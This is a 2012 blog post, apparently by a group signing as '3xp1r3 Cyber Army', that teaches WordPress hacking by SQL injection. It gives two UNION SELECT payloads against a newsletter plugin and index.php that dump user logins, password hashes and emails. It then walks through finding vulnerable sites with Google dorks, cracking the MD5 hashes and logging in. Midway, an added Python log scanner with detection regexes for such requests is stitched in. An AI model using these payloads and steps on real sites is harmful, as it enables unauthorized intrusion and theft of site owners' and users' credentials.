Friday, February 10, 2012

WordPress SQL Injection Hacks


There are millions of sites hosted on WordPress. I have already posted some tutorials on WordPress hacking, which you can check here, so this is a new tutorial on WordPress hacking with SQL injections. Let's see.




Click here to check the list of WordPress SQL injections

How to use it?

For example, the 1st injection is "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--", index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*

Now modify it into a Google dork. To make the dork, use "inurl:injection's php or dir here". For example, for this injection the dork will be "inurl:wp-content/plugins/st_newsletter/stnl_iframe.php".

Now go to Google.com, type your modified dork and look at the search results. For this dork a search result will look like this: http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=

Remove the words after iframe.php and put your SQL injection there. Now the URL will be http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--

You will get the username and the MD5-coded password. Crack the password using MD5 decoding tools and log in here: http://site.com/wp-login.php

Note: The process is the same for all injections. Comment below if you have any doubt.
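Seen from the server side, requests shaped like the two strings quoted above are easy to pick out of a web access log. The following is an added example, not part of the original post: it decodes each request's query string and flags those that combine several of the features visible in those strings. The log lines, IP addresses (documentation ranges), signal names and the threshold are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines (Combined Log Format); IPs are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Feb/2012:10:01:02 +0000] "GET /wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users-- HTTP/1.1" 200 512',
    '198.51.100.23 - - [10/Feb/2012:10:04:40 +0000] "GET /index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/* HTTP/1.1" 500 0',
    '192.0.2.10 - - [10/Feb/2012:10:05:11 +0000] "GET /index.php?cat=5 HTTP/1.1" 200 1024',
    '192.0.2.11 - - [10/Feb/2012:10:06:30 +0000] "GET /?s=student+union+select+committee HTTP/1.1" 200 2048',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Each signal mirrors a feature of the request strings quoted in the post.
SIGNALS = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "users-table": re.compile(r"\bfrom\s+\w*users\b", re.I),
    "credential-columns": re.compile(r"\buser_(?:login|pass|email)\b", re.I),
    "trailing-comment": re.compile(r"(?:--|/\*)\s*$"),
}

def signals(target):
    """Return the names of the signals present in the decoded query string."""
    query = target.partition("?")[2]
    decoded = re.sub(r"\s+", " ", unquote_plus(query))  # handles both '+' and %20
    return [name for name, rx in SIGNALS.items() if rx.search(decoded)]

def scan(lines, threshold=2):
    """Flag requests with at least `threshold` signals; one alone is too noisy."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line this parser understands
        hits = signals(m["target"])
        if len(hits) >= threshold:
            alerts.append({
                "ip": m["ip"],
                "path": m["target"].partition("?")[0],
                "status": int(m["status"]),  # a 200 deserves a closer look than a 404
                "signals": hits,
            })
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The search for "student union select committee" trips only one signal and stays below the threshold, which is why the check requires a combination rather than a single keyword.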


3xp1r3 Cyber Army. Copyright 2012 All Rights Reserved Design by hip hop 3xp1r3 All Greatz To: 3xp1r3 cyber Army